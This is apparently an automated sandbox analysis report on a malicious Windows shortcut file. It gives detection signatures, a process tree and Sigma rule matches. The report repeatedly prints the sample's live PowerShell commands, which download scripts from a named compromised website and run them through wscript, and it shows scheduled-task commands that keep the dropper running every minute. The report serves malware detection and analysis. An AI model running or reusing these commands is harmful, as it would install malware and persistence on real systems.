Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yT6gJFN0SR.lnk

Overview

General Information

Sample name:yT6gJFN0SR.lnk
renamed because original name is a hash value
Original sample name:d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
Analysis ID:1567191
MD5:a8adbb0f006cbb7a70d7c2dcb0e2cff6
SHA1:38f9fbf5a68943dc8f265191bb302722afed95d7
SHA256:d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
Tags:lnkwww-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7288 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7348 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7604 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7620 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7872 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8104 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 8120 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 1660 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4016 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 368 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6652JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 6652INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1b24e:$b3: ::UTF8.GetString(
    • 0x22be0:$b3: ::UTF8.GetString(
    • 0x132d8e:$b3: ::UTF8.GetString(
    • 0x1366b9:$b3: ::UTF8.GetString(
    • 0x138706:$b3: ::UTF8.GetString(
    • 0x138be1:$b3: ::UTF8.GetString(
    • 0x138df9:$b3: ::UTF8.GetString(
    • 0x13fc10:$b3: ::UTF8.GetString(
    • 0x13fe28:$b3: ::UTF8.GetString(
    • 0x144de6:$b3: ::UTF8.GetString(
    • 0x144ffe:$b3: ::UTF8.GetString(
    • 0x145ba0:$b3: ::UTF8.GetString(
    • 0x172e85:$b3: ::UTF8.GetString(
    • 0x17309d:$b3: ::UTF8.GetString(
    • 0x1747b6:$b3: ::UTF8.GetString(
    • 0x24eca0:$b3: ::UTF8.GetString(
    • 0x24f020:$b3: ::UTF8.GetString(
    • 0x24f268:$b3: ::UTF8.GetString(
    • 0x265ab3:$b3: ::UTF8.GetString(
    • 0x265ce2:$b3: ::UTF8.GetString(
    • 0x26612e:$b3: ::UTF8.GetString(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_6652.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Sigma detected: Script Interpreter Execution From Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Sigma detected: Suspicious Invoke-WebRequest Execution
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7348, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", ProcessId: 7428, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6652, TargetFilename: C:\Users\user\AppData\Local\Temp\epZTzlYAtsWrS0.js
      Sigma detected: PowerShell Download Pattern
      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Sigma detected: Suspicious Schtasks From Env Var Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Sigma detected: Use Short Name Path in Command Line
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
